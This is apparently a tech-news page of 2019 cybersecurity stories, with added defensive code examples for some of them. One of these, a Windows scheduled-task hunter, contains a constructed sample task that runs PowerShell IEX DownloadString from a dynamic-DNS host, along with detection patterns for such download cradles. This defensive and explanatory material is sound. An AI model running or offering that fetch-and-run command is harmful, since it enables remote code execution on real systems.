Tech News - Cybersecurity

373 Articles
Melisha Dsouza
06 Mar 2019
5 min read

Researchers discover Spectre-like new speculative flaw, “SPOILER”, in Intel CPUs

Intel CPUs are reportedly vulnerable to a new attack, “SPOILER: Speculative Load Hazards Boost Rowhammer and Cache Attacks”. The vulnerability takes advantage of speculative execution in Intel CPUs and was discovered by computer scientists at Worcester Polytechnic Institute in Massachusetts and the University of Lübeck in Germany. According to the research, the flaw is a “novel microarchitectural leakage which reveals critical information about physical page mappings to user space processes.” It can be exploited by malicious JavaScript in a browser tab, by malware running on the system, or by any unprivileged logged-in user, and the leaked information is a stepping stone for stealing sensitive data from running applications. The paper further states that the leakage can be exploited with a limited set of instructions, is visible in all Intel generations starting from the first-generation Intel Core processors, and is independent of the operating system. It also works from within virtual machines and sandboxed environments.

SPOILER is related to the Spectre attacks disclosed in January 2018. Like Spectre it depends on speculative execution, but what it reveals is memory layout information, which makes other attacks, such as Rowhammer, cache attacks and JavaScript-based attacks, easier to carry out. “The root cause of the issue is that the memory operations execute speculatively and the processor resolves the dependency when the full physical address bits are available,” says Ahmad Moghimi, one of the researchers who contributed to the paper. “Physical address bits are security sensitive information and if they are available to user space, it elevates the user to perform other micro architectural attacks.” Intel was informed of the findings in early December 2018 but did not immediately respond to the researchers.

An Intel spokesperson has since provided TechRadar with the following statement on SPOILER: “Intel received notice of this research, and we expect that software can be protected against such issues by employing side channel safe software development practices. This includes avoiding control flows that are dependent on the data of interest. We likewise expect that DRAM modules mitigated against Rowhammer style attacks remain protected. Protecting our customers and their data continues to be a critical priority for us and we appreciate the efforts of the security community for their ongoing research.”

Impact of SPOILER on Rowhammer attacks in a native user-level environment

The paper defines a Rowhammer attack as “an attack causing cells of a victim row to leak faster by activating the neighboring rows repeatedly. If the refresh cycle fails to refresh the victim fast enough, that leads to bit flips. Once bit flips are found, they can be exploited by placing any security-critical data structure or code page at that particular location and triggering the bit flip again.” To perform a Rowhammer attack, the adversary needs access to DRAM rows adjacent to the victim row and must therefore find virtual pages that co-locate in the same DRAM bank. Double-sided Rowhammer produces bit flips faster, because of the extra charge on the cells on both sides of the victim row, but it additionally requires access to contiguous memory pages. SPOILER boosts both single- and double-sided Rowhammer with its additional 8 bits of physical address information, which also makes it possible to detect contiguous memory. The researchers used SPOILER to detect aliased virtual addresses, meaning addresses whose physical addresses agree in their 20 least significant bits. The memory controller uses these bits, among others, to map physical addresses to DRAM banks, and SPOILER reveals the majority of them.

Further, “an attacker can directly hammer such aliased addresses to perform a more efficient single-sided Rowhammer attack with a significantly increased probability of hitting the same bank.” The researchers reverse-engineered the DRAM address mappings of several hardware configurations with the DRAMA tool and found that only a few bits of physical address entropy beyond the 20 known bits remain unknown. To verify that aliased virtual addresses co-locate in the same bank, they used the row-conflict side channel, and observed that whenever the number of physical address bits the memory controller uses for bank mapping is 20 or fewer, the aliased addresses always hit the same bank. In summary, SPOILER drastically improves the efficiency of finding addresses that map to the same bank, with neither administrative privileges nor a reverse-engineering of the memory controller mapping, and the approach also works in sandboxed environments such as JavaScript. The research paper has further details on the SPOILER flaw.
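The same-bank argument above can be made concrete. The following is an added example written for this page, not code from the SPOILER paper or from the article: it models a DRAM bank mapping the way DRAMA-style reverse engineering reports it, as a set of XOR functions over physical address bits, and computes the probability that two addresses known to agree on their low bits land in the same bank. The mapping is constructed for illustration and is not any real CPU's; the two known-bit counts are the 12 page-offset bits any user process knows and the 20 bits SPOILER reveals.

```python
"""Added example (not from the SPOILER paper): same-bank probability under an XOR
bank mapping, for an attacker who knows only the low k bits of physical addresses."""
from typing import Iterable, Sequence

# Constructed illustrative bank mapping (an assumption, not a real controller's).
# Each entry is a bit mask; the bank index is the tuple of XOR-parities of the
# address bits selected by each mask, which is the form DRAMA-style tools report.
ILLUSTRATIVE_MAPPING = [
    (1 << 13) | (1 << 17),
    (1 << 14) | (1 << 18),
    (1 << 15) | (1 << 19),
    (1 << 16) | (1 << 20),
    (1 << 6) | (1 << 13),
]

PAGE_OFFSET_BITS = 12    # known to any user process (4 KiB pages)
SPOILER_KNOWN_BITS = 20  # page offset plus the 8 bits SPOILER leaks


def parity(x: int) -> int:
    return bin(x).count("1") & 1


def bank_index(phys_addr: int, mapping: Sequence[int]) -> tuple:
    """Bank selected by a physical address under an XOR-function mapping."""
    return tuple(parity(phys_addr & mask) for mask in mapping)


def gf2_rank(rows: Iterable[int]) -> int:
    """Rank over GF(2) of bit-vectors stored as ints (Gaussian elimination)."""
    rows = [r for r in rows if r]
    rank = 0
    while rows:
        pivot = rows.pop()
        if not pivot:
            continue
        rank += 1
        high = pivot.bit_length() - 1
        rows = [r ^ pivot if (r >> high) & 1 else r for r in rows]
    return rank


def same_bank_probability(mapping: Sequence[int], known_low_bits: int) -> float:
    """P(two addresses agreeing on bits [0, known_low_bits) share a bank).

    Unknown bits are modelled as uniform and independent, so every linearly
    independent XOR function that still depends on an unknown bit halves the
    chance of a match: P = 2 ** -rank(functions restricted to unknown bits).
    """
    unknown = ~((1 << known_low_bits) - 1)
    restricted = [mask & unknown for mask in mapping]
    return 2.0 ** -gf2_rank(restricted)


def needs_only_low_bits(mapping: Sequence[int], known_low_bits: int) -> bool:
    """True when every mapping bit is known: aliased addresses then always co-locate."""
    return all(mask >> known_low_bits == 0 for mask in mapping)


if __name__ == "__main__":
    for known in (PAGE_OFFSET_BITS, SPOILER_KNOWN_BITS):
        p = same_bank_probability(ILLUSTRATIVE_MAPPING, known)
        print("known low bits = %2d: P(same bank) = %g" % (known, p))
    # Two constructed addresses that agree on their low 20 bits: bit 21 is unused by
    # the mapping, so flipping it keeps the bank; bit 20 is used, so flipping it does not.
    a = 0x12345678
    print("bank(a) == bank(a ^ bit21):", bank_index(a, ILLUSTRATIVE_MAPPING) == bank_index(a ^ (1 << 21), ILLUSTRATIVE_MAPPING))
    print("bank(a) == bank(a ^ bit20):", bank_index(a, ILLUSTRATIVE_MAPPING) == bank_index(a ^ (1 << 20), ILLUSTRATIVE_MAPPING))
```

With the page offset alone, five independent functions remain unknown and a random aliased pair hits the same bank with probability 1/32; with SPOILER's 20 bits only the function touching bit 20 is unresolved, giving 1/2, and a mapping confined to bits below 20 gives certainty, which is the paper's observation for controllers using 20 or fewer bits.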

Savia Lobo
06 Mar 2019
2 min read

NSA releases Ghidra, a free software reverse engineering (SRE) framework, at the RSA security conference

The National Security Agency released the Ghidra toolkit today at the RSA security conference in San Francisco. Ghidra is a free software reverse engineering (SRE) framework developed by NSA's Research Directorate for the agency's cybersecurity mission. It is used to analyze malicious code such as malware, and it can give security professionals a better understanding of potential vulnerabilities in their networks and systems. “The NSA's general plan was to release Ghidra so security researchers can get used to working with it before applying for positions at the NSA or other government intelligence agencies with which the NSA has previously shared Ghidra in private”, ZDNet reports. News of the coming release broke at the start of 2019, and users have been looking forward to it since, because Ghidra is a free alternative to IDA Pro, a comparable reverse engineering tool that is only available under an expensive commercial license priced at thousands of US dollars per year. NSA cybersecurity advisor Rob Joyce said that Ghidra is capable of analyzing binaries written for a wide variety of architectures and can easily be extended with more if needed.

https://twitter.com/RGB_Lights/status/1103019876203978752

Key features of Ghidra

- A suite of software analysis tools for analyzing compiled code on a variety of platforms, including Windows, macOS and Linux.
- Disassembly, assembly, decompilation, graphing and scripting, among hundreds of other features.
- Support for a wide variety of processor instruction sets and executable formats, usable in both interactive and automated modes.
- An exposed API with which users can develop their own Ghidra plug-in components and scripts.

To know more about Ghidra, visit its documentation in the GitHub repo or its official website.
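An added example of the scripting the last feature refers to, written for this page rather than taken from the Ghidra project: a Ghidra Python (Jython) script that builds the program's call graph through the exposed API and reports the shortest call chain from an entry function to unsafe sinks such as strcpy or system. The sink list, the default entry-function name and the sample call graph at the bottom are assumptions for illustration; the API calls (FunctionManager.getFunctions, Function.getCalledFunctions) and the currentProgram, monitor, askString and println names are the ones Ghidra injects into scripts. The graph search itself is plain Python and runs outside Ghidra.

```python
"""Added example: a Ghidra Python (Jython) script, not code from the Ghidra project.
Run it from Ghidra's Script Manager; sink_paths() is plain Python and runs anywhere."""
from collections import deque

# Illustrative sink list (an assumption): functions whose reachability is worth reviewing.
SINKS = frozenset(["strcpy", "strcat", "sprintf", "gets", "system", "popen"])


def sink_paths(call_graph, entry, sinks=SINKS, max_depth=8):
    """Shortest call chain from `entry` to each reachable sink.

    call_graph maps a function name to the set of names it calls; max_depth is
    the largest number of calls in a chain. Returns {sink: [entry, ..., sink]}
    (breadth-first, so each chain is a shortest one); unreachable sinks are absent.
    """
    found = {}
    queue = deque([(entry, [entry])])
    seen = set([entry])
    while queue:
        node, path = queue.popleft()
        if len(path) - 1 >= max_depth:
            continue
        for callee in sorted(call_graph.get(node, ())):
            if callee in sinks:
                found.setdefault(callee, path + [callee])
            elif callee not in seen:
                seen.add(callee)
                queue.append((callee, path + [callee]))
    return found


def call_graph_from_program(program, task_monitor):
    """Build {caller: {callees}} with Ghidra's FunctionManager / Function API."""
    graph = {}
    for func in program.getFunctionManager().getFunctions(True):
        # getCalledFunctions includes the thunks Ghidra creates for imports such as strcpy
        callees = func.getCalledFunctions(task_monitor)
        graph[func.getName()] = set(c.getName() for c in callees)
    return graph


def run_in_ghidra():
    # currentProgram, monitor, askString and println are injected by Ghidra into scripts.
    graph = call_graph_from_program(currentProgram, monitor)
    entry = askString("Sink reachability", "Entry function name", "main")
    paths = sink_paths(graph, entry)
    if not paths:
        println("no sink reachable from %s" % entry)
    for sink in sorted(paths):
        println("%s: %s" % (sink, " -> ".join(paths[sink])))


# Constructed sample call graph (an assumption) so the search can be exercised outside Ghidra.
SAMPLE_CALL_GRAPH = {
    "main": set(["parse_args", "handle_request"]),
    "parse_args": set(["strlen", "atoi"]),
    "handle_request": set(["read_line", "build_reply"]),
    "read_line": set(["recv", "strcpy"]),
    "build_reply": set(["snprintf", "log_msg"]),
    "log_msg": set(["system"]),
}

if "currentProgram" in globals():
    run_in_ghidra()
elif __name__ == "__main__":
    for sink, path in sorted(sink_paths(SAMPLE_CALL_GRAPH, "main").items()):
        print("%s: %s" % (sink, " -> ".join(path)))
```

The script stays on Python 2 syntax because Ghidra's bundled interpreter is Jython; the same file imports cleanly under Python 3, where only the sample graph is used.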

Savia Lobo
05 Mar 2019
2 min read

Security researcher exposes malicious GitHub repositories that host more than 300 backdoored apps

An unnamed security researcher at dfir.it recently revealed GitHub accounts hosting more than “300 backdoored Windows, Mac, and Linux applications and software libraries”. In a blog post titled “The Supreme Backdoor Factory” the researcher explains how he stumbled upon the malicious code and the other repositories connected to it. The investigation started when he spotted a malicious version of the JXplorer LDAP browser: “I did not expect an installer for a quite popular LDAP browser to create a scheduled task in order to download and execute PowerShell code from a subdomain hosted by free dynamic DNS provider.” According to ZDNet, “All the GitHub accounts that were hosting these files --backdoored versions of legitimate apps-- have now been taken down.” The backdoored installers gained boot persistence on infected systems and then downloaded further malicious code. The researcher also found that the apps downloaded a Java-based malware named Supreme NYC Blaze Bot (supremebot.exe). “According to researchers, this appeared to be a "sneaker bot," a piece of malware that would add infected systems to a botnet that would later participate in online auctions for limited edition sneakers”, ZDNet reports. Some of the malicious entries were made from an account under the name Andrew Dunkins, which held a set of nine repositories, each hosting Linux cross-compilation tools and each watched or starred by several accounts already known to be suspicious. The report notes that accounts that did not host backdoored apps were used to star or watch the malicious repositories, boosting their popularity in GitHub's search results.

To learn about these backdoored apps in detail, read the complete report, “The Supreme Backdoor Factory”.
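The persistence mechanism the researcher describes, a scheduled task that pulls PowerShell from a dynamic-DNS host, is something a responder can hunt for directly in the task definitions Windows stores under C:\Windows\System32\Tasks, which are XML. The following is an added example written for this page, not tooling from the dfir.it report: it parses a task definition and flags download cradles, dynamic-DNS hosts and boot/logon triggers. The two task definitions, the dynamic-DNS suffix list and the regex indicators are constructed for illustration, not taken from the actual malware.

```python
"""Added example (not the dfir.it report's tooling): hunt Windows Task Scheduler
definitions for PowerShell-from-dynamic-DNS persistence. Indicator lists and
both sample tasks are constructed."""
import os
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Illustrative indicators (assumptions): free dynamic-DNS suffixes and download-cradle idioms.
DYNDNS_SUFFIXES = ("ddns.net", "no-ip.org", "no-ip.com", "duckdns.org", "hopto.org")
CRADLE_INDICATORS = {
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b",
    "invoke_expression": r"\biex\b|invoke-expression",
    "encoded_command": r"(^|\s)-e(nc|ncodedcommand|c)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
}
PERSISTENCE_TRIGGERS = {"BootTrigger", "LogonTrigger"}


def is_dyndns_host(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def analyze_task(xml_data):
    """Findings for one task definition (str, or the raw bytes of a Tasks\\ file); [] if clean."""
    root = ET.fromstring(xml_data)
    findings = []
    for exec_el in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = exec_el.findtext("t:Command", default="", namespaces=TASK_NS)
        args = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if not re.search(r"powershell|pwsh", command, re.I):
            continue  # this example scores PowerShell actions only
        for name, pattern in CRADLE_INDICATORS.items():
            if re.search(pattern, args, re.I):
                findings.append(name)
        for host in re.findall(r"https?://([A-Za-z0-9.-]+)", args):
            if is_dyndns_host(host):
                findings.append("dyndns_host:" + host.lower())
    if findings:
        # A suspicious action that is also boot/logon-triggered is the persistence pattern in the report.
        triggers_el = root.find("t:Triggers", TASK_NS)
        for trig in ([] if triggers_el is None else triggers_el):
            tag = trig.tag.split("}")[-1]
            if tag in PERSISTENCE_TRIGGERS:
                findings.append("persistence:" + tag)
    return findings


def scan_tasks_dir(tasks_dir=r"C:\Windows\System32\Tasks"):
    """Walk the live task store; files are UTF-16 XML, so hand expat the bytes and let it honour the BOM."""
    for dirpath, _, filenames in os.walk(tasks_dir):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                findings = analyze_task(data)
            except ET.ParseError:
                continue
            if findings:
                yield path, findings


# Constructed sample definitions (assumptions, not the real malware's task).
MALICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\WindowsUpdateCheck</URI></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -Command "IEX ((New-Object Net.WebClient).DownloadString('http://sys-update.ddns.net/ps/a.txt'))"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("constructed malicious task", MALICIOUS_TASK),
                            ("constructed benign task", BENIGN_TASK)):
        print(label, "->", analyze_task(xml_text) or "clean")
```

On a live host, iterate scan_tasks_dir() from an elevated prompt; the same analyze_task() also works on the XML that `schtasks /query /xml` emits for a single task.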

Natasha Mathur
04 Mar 2019
3 min read

Microsoft adds new features to Microsoft Office 365: Microsoft threat experts, priority notifications, Desktop App Assure, and more

Microsoft posted an update last week on new features in Microsoft Office 365, its subscription offering of premium productivity apps from the Office product line. “We released several new capabilities to help you stay ahead of threats, create a more productive workplace, and keep you in the flow of work”, states the Microsoft team.

What's new in Microsoft 365?

Microsoft Threat Experts

Microsoft Threat Experts is a new threat-hunting service intended to extend the capabilities of security teams. It helps track down and prioritize threats using Windows Defender Advanced Threat Protection (ATP), and a new “Ask a threat expert” button connects you with Microsoft's experts to work through difficult investigations.

Priority notifications and integration of electronic health records

Priority notifications in Microsoft Teams let clinicians focus on urgent messages to manage patient care. Teams can also now integrate FHIR-enabled electronic health records (EHR) data, so clinicians can securely access patient records, chat with other team members and start a video meeting from one place.

Desktop App Assure and Microsoft FastTrack

Desktop App Assure is a new service, part of Microsoft FastTrack, that offers app compatibility services for Windows 10 and Office 365 ProPlus. FastTrack now also provides guidance on configuring Exchange Online Protection, Office 365 Advanced Threat Protection, Office 365 Message Encryption and Data Loss Prevention policies.

Security notifications via Microsoft Authenticator

You can now receive security alerts for important events on your personal Microsoft account through the Microsoft Authenticator app. Once you receive the push notification you can quickly review your account activity and take action to protect the account. You can also add two-step verification to the account with Microsoft Authenticator.

New Office app for Windows 10

Users with a work, school or personal Microsoft account can use the new Office app for Windows 10 to reach their available apps, relevant files and documents. Organizations can also integrate third-party apps and enable users to search for documents and people across the organization. The new Office app requires a current version of Windows 10.

Add data to Excel using a photo

The Excel app can take a picture of a printed data table on an Android device and convert it into a fully editable table in Excel, removing the need to enter hardcopy data manually. The feature has started rolling out in the Excel Android app and will support iOS soon.

New file-attached tasks in Microsoft To-Do

Users can now attach files and photos to tasks to make them more actionable. Microsoft says this was a highly requested feature; it is available on all platforms and syncs across all your devices.

For more information, check out the official Microsoft blog.

Savia Lobo
04 Mar 2019
3 min read

Google’s Project Zero reveals a “High severity” copy-on-write security flaw found in macOS kernel

A security researcher from Google's Project Zero recently revealed a high-severity flaw in how the macOS kernel handles copy-on-write (COW) memory, a resource-management technique also referred to as shadowing. The researcher informed Apple of the flaw in November 2018, but the company has yet to ship a fix and the 90-day disclosure deadline has passed, which is why the bug is now public with a “high severity” label. According to the post in Monorail, the issue tracker Project Zero shares with Chromium, “The copy-on-write behavior works not only with anonymous memory but also with file mappings. This means that, after the destination process has started reading from the transferred memory area, memory press can cause the pages holding the transferred memory to be evicted from the page cache. Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem.” “This means that if an attacker can mutate an on-disk file without informing the virtual management subsystem, this is a security bug. MacOS permits normal users to mount filesystem images. When a mounted filesystem image is mutated directly (e.g. by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem”, the post further reads. According to a Google project member, “We've been in contact with Apple regarding this issue, and at this point no fix is available. Apple is intending to resolve this issue in a future release, and we're working together to assess the options for a patch. We'll update this issue tracker entry once we have more details.”

A user commented on Hacker News, “Given the requirements that a secondary process should even be able to modify a file that is already open, I guess the expected behavior is that the 1st process's version should remain cached in memory while allowing the on-disk (CoW) version to be updated? While also informing the 1st process of the update and allowing the 1st process to reload/reopen the file if it chooses to do so. If this is the intended/expected behavior, then it follows that pwrite() and other syscalls should inform the kernel and prevent the original cache from being flushed.” To know more about this news, head over to the bug issue post.

Savia Lobo
01 Mar 2019
2 min read

Coinhive to shut down all its cryptojacking services on March 8!

Coinhive, an in-browser Monero cryptocurrency miner, has announced that it will shut down all its operations next week, on March 8, 2019. Users have until April 30 to withdraw any remaining Monero from their accounts. Launched in 2017, the Coinhive service provided a way to mine cryptocurrency in the background of a website, turning visitors' processing power directly into cash. In its blog post the company gave reasons for the closure, including the fall in the value of Monero over the past year: “The drop in hash rate (over 50%) after the last Monero hard fork hit us hard. So did the 'crash' of the cryptocurrency market with the value of XMR depreciating over 85% within a year. This and the announced hard fork and algorithm update of the Monero network on March 9 has led us to the conclusion that we need to discontinue Coinhive.” Security researcher Troy Mursch said that “Coinhive had a market share of 62 percent in August 2018”, and, according to an academic paper cited by ZDNet, the company was making an estimated $250,000 per month up until last summer.

https://twitter.com/bad_packets/status/1030201187381927936

Jérôme Segura, malware researcher at Malwarebytes, told ZDNet: “While 'cryptojacking' or 'drive-by mining' dominated the threat landscape in late 2017 and early 2018, it took a backseat for the rest of the year, with the notable exception of some campaigns powered by a large number of compromised IoT devices (i.e. MikroTik exploits).” The Verge reports: “Some sites were upfront with visitors about their use of the software, most notably the news website Salon and UNICEF, but countless others either didn't disclose the fact they were using it or saw the Javascript code added without their knowledge as part of a “cryptojacking” malware attack. Eventually, ad-blockers and anti-virus software learned to identify and block such code, so that users could avoid having their CPUs used and their batteries drained by the software”. To know more about the Coinhive closure, head over to Coinhive's official blog post.
Savia Lobo
28 Feb 2019
3 min read

MarioNet: A browser-based attack that allows hackers to run malicious code even if users exit a web page

If you think closing a web page ends its ability to run code on your device, you are wrong. Greek researchers have described a new browser-based attack, MarioNet, with which attackers can keep running malicious code inside users' browsers after the users have closed, or navigated away from, the web page on which they were infected. Their paper, “Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation”, also evaluates existing anti-malware browser extensions and anti-mining countermeasures, and puts forward several mitigations that browser makers could adopt. MarioNet was presented on February 25 at the NDSS 2019 conference in San Diego, USA.

MarioNet allows attackers to assemble giant botnets from users' browsers. The researchers state that these bots can be used for in-browser crypto-mining (cryptojacking), DDoS attacks, malicious file hosting and sharing, distributed password cracking, proxy networks, advertising click fraud and traffic-statistics boosting. MarioNet survives the user leaving the page because modern browsers support the Service Worker API. “This mechanism allows a website to isolate operations that render a page's user interface from operations that handle intense computational tasks so that the web page UI doesn't freeze when processing large quantities of data”, ZDNet reports. The paper explains that service workers are a successor to the older Web Workers API: unlike a web worker, a service worker, once registered and activated, can live and run in the background without requiring the user to keep browsing the site that loaded it.

The attack routine consists of registering a service worker when the user lands on an attacker-controlled website and then abusing the service worker's SyncManager interface to keep it alive after the user navigates away. No user interaction is required, because browsers neither alert users nor ask for permission before registering a service worker; everything happens under the hood while the page loads. An attacker can therefore place the malicious code on a high-traffic website for a short period, infect a large user base, remove the code, and continue to control the infected browsers from a central server. The attack can even persist across browser restarts by abusing the Web Push API, though that does require obtaining the user's permission for push notifications. Because service workers were introduced several years ago, MarioNet works in almost all desktop and mobile browsers; the exceptions the researchers list are IE (desktop), Opera Mini (mobile) and the BlackBerry browser (mobile). To know more about MarioNet in detail, read the complete research paper.

Natasha Mathur
27 Feb 2019
4 min read

New research from Eclypsium discloses a vulnerability in Bare Metal Cloud Servers that allows attackers to steal data

Security researchers at Eclypsium, a hardware security startup, published a paper yesterday examining weaknesses in bare-metal cloud servers that let an attacker implant malicious firmware and steal data. “We found weaknesses in methods for updating server BMC firmware that would allow an attacker to install malicious BMC firmware..these vulnerabilities can allow an attacker to not only do damage but also add other malicious implants that can persist and steal data”, the researchers state. The baseboard management controller (BMC) is a highly privileged component that implements the Intelligent Platform Management Interface (IPMI). It can monitor the state of a computer and allow an operating system reinstall from a remote management console over its own independent connection, so there is no need to physically attach a monitor, keyboard and installation media to a server that has one.

Bare-metal cloud offerings come with considerable benefits but also pose new security risks. In most cloud services, once a customer releases a bare-metal server the hardware is reclaimed by the service provider and repurposed for another customer, so the same physical machine passes through a succession of owners, each with direct control over the hardware. An attacker can therefore pay a nominal sum for access to a server, implant malicious firmware in the UEFI, the BMC, or drives and network adapters, and then release the hardware back to the provider, who may pass it on to the next customer. Eclypsium used IBM SoftLayer as a case study to test this scenario, but the researchers note that the attack is not limited to any one service provider. IBM acquired SoftLayer Technologies, a managed hosting and cloud computing provider, in 2013; it is now known as IBM Cloud. The vulnerability has been named Cloudborne.

The researchers chose SoftLayer as the testing environment for its simple logistics and easy access to hardware; SoftLayer was also using Supermicro server hardware with known BMC firmware vulnerabilities. Provisioning the server took about 45 minutes. Once the instance was provisioned, the team confirmed it was running the latest BMC firmware, created an additional IPMI user with administrative access to the BMC channels, and made a one-bit change to the BMC firmware. The system was then released to IBM, which kicked off the reclamation process. After the server was re-provisioned, the researchers found that the additional IPMI user had been removed, but the firmware still carried the flipped bit, meaning the BMC firmware was not re-flashed during reclamation. “The combination of using vulnerable hardware and not re-flashing the firmware makes it possible to implant malicious code into the server's BMC firmware and inflict damage or steal data from IBM clients that use that server in the future”, the researchers state. BMC logs were also retained across provisioning, giving the new customer insight into the previous owner's actions, and the BMC root password stayed the same across provisioning, so an attacker would keep control of the machine later. “While these issues have heightened importance for bare-metal services, they also apply to all services hosted in public and private clouds..to secure their applications, organizations must be able to manage these issues—or run the risk of endangering their most critical assets”, the Eclypsium researchers write. For more information, check out the official Eclypsium paper.
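The reclamation problems Eclypsium describes (a leftover IPMI user, firmware that was never re-flashed, a retained event log) are exactly what a tenant should check the moment a bare-metal server is handed over. The following is an added example written for this page, not Eclypsium's tooling: it parses the text that `ipmitool user list`, `ipmitool mc info` and `ipmitool sel info` print, and compares a dump of the BMC firmware image against a known-good hash, so that a single flipped bit is caught even though the reported firmware revision is unchanged. All command output and both firmware images below are constructed for illustration.

```python
"""Added example (not Eclypsium's tooling): post-provisioning BMC checks for a
bare-metal tenant. The ipmitool output and firmware images are constructed;
the column layouts are ipmitool's, the values are not real."""
import hashlib
import re


def parse_kv(text):
    """'Key : Value' lines as printed by `ipmitool mc info` and `ipmitool sel info`."""
    out = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            out[key.strip()] = value.strip()
    return out


def parse_user_list(text):
    """Rows of `ipmitool user list <channel>`: ID, Name, Callin, Link Auth, IPMI Msg, Channel Priv Limit."""
    users = []
    for line in text.splitlines():
        m = re.match(r"^\s*(\d+)\s+(\S.*\S)\s*$", line)
        if not m:
            continue
        uid, rest = m.groups()
        fields = rest.split()
        # The anonymous user (ID 1) has an empty name, so its row starts with the Callin flag.
        if fields[0].lower() in ("true", "false"):
            name, flags = "", fields
        else:
            name, flags = fields[0], fields[1:]
        if len(flags) < 4:
            continue
        users.append({"id": int(uid), "name": name,
                      "ipmi_msg": flags[2].lower() == "true",
                      "priv": " ".join(flags[3:])})
    return users


def audit_bmc(user_list_out, mc_info_out, sel_info_out, firmware_image,
              expected_users, golden_firmware_sha256):
    """Findings that should stop a tenant deploying on a freshly provisioned server."""
    findings = []
    # 1. Leftover IPMI accounts: anyone with IPMI messaging enabled who is not expected.
    for user in parse_user_list(user_list_out):
        if user["ipmi_msg"] and user["name"] not in expected_users:
            findings.append("unexpected_ipmi_user:%s(%s)" % (user["name"], user["priv"]))
    # 2. Firmware that was never re-flashed: the revision string survives a one-bit
    #    tamper, so compare a dump of the image against a known-good hash instead.
    revision = parse_kv(mc_info_out).get("Firmware Revision", "?")
    if hashlib.sha256(firmware_image).hexdigest() != golden_firmware_sha256:
        findings.append("firmware_image_mismatch:rev=%s" % revision)
    # 3. A System Event Log that still holds the previous tenant's entries.
    entries = int(parse_kv(sel_info_out).get("Entries", "0") or 0)
    if entries:
        findings.append("sel_not_cleared:%d_entries" % entries)
    return findings


# Constructed data. GOLDEN_IMAGE stands in for the vendor's BMC image; TAMPERED_IMAGE
# differs from it by a single flipped bit, as in the research.
GOLDEN_IMAGE = bytes(range(256)) * 64
GOLDEN_SHA256 = hashlib.sha256(GOLDEN_IMAGE).hexdigest()
TAMPERED_IMAGE = bytearray(GOLDEN_IMAGE)
TAMPERED_IMAGE[4097] ^= 0x01
TAMPERED_IMAGE = bytes(TAMPERED_IMAGE)

USER_LIST_OUT = """ID  Name\t     Callin  Link Auth\tIPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   ADMIN            true    false      true       ADMINISTRATOR
3   svc-remote       true    false      true       ADMINISTRATOR
"""
MC_INFO_OUT = """Device ID                 : 32
Device Revision           : 1
Firmware Revision         : 3.55
IPMI Version              : 2.0
"""
SEL_INFO_OUT = """SEL Information
Version          : 1.5 (v1.5, v2 compliant)
Entries          : 27
Free Space       : 9632 bytes
"""

if __name__ == "__main__":
    for finding in audit_bmc(USER_LIST_OUT, MC_INFO_OUT, SEL_INFO_OUT, TAMPERED_IMAGE,
                             expected_users={"ADMIN"}, golden_firmware_sha256=GOLDEN_SHA256):
        print(finding)
```

The firmware dump itself comes from the vendor's update utility or from the BMC over IPMI, and the known-good hash from the vendor image you would flash yourself; the point of the check is that a revision string, which is all `mc info` reports, cannot tell a re-flashed image from a tampered one.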

Savia Lobo
25 Feb 2019
4 min read

Researchers highlight design weaknesses in the 4G and 5G Cellular Paging Protocols

Researchers from Purdue University and the University of Iowa have found three new security flaws in the 4G and 5G protocols that can allow an intruder to intercept calls and track a device's location. Their paper, “Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information”, describes design weaknesses in the 4G/5G cellular paging protocol that an attacker can use to detect a victim's presence in a particular cell area knowing only a soft identity of the victim (e.g., phone number or Twitter handle), with a new attack called ToRPEDO (TRacking via Paging mEssage DistributiOn). ToRPEDO in turn enables two further attacks, PIERCER and IMSI-Cracking. The researchers state, “All of our attacks have been validated in a realistic setting for 4G using cheap software-defined radio and open-source protocol stack.” According to TechCrunch, “Hussain, along with Ninghui Li and Elisa Bertino at Purdue University, and Mitziu Echeverria and Omar Chowdhury at the University of Iowa are set to reveal their findings at the Network and Distributed System Security Symposium in San Diego on Tuesday.”

The three security flaws in the 4G/5G cellular paging protocols

The ToRPEDO attack

ToRPEDO exploits a weakness of the 4G/5G paging protocol: if the attacker knows the victim's phone number, they can verify the victim's presence in a particular cellular area and, in the process, identify the victim's paging occasion. That lets an adversary verify coarse-grained location information, inject fabricated paging messages, and mount denial-of-service attacks.

The PIERCER attack

PIERCER exploits a 4G paging deployment vulnerability that allows an attacker to determine a victim's international mobile subscriber identity (IMSI) on the 4G network.

The IMSI-Cracking attack

This attack leaks the victim's IMSI on both 4G and 5G. The paper demonstrates how, using ToRPEDO as a sub-step, an attacker can retrieve a victim device's persistent identity (the IMSI) with a brute-force IMSI-Cracking attack.

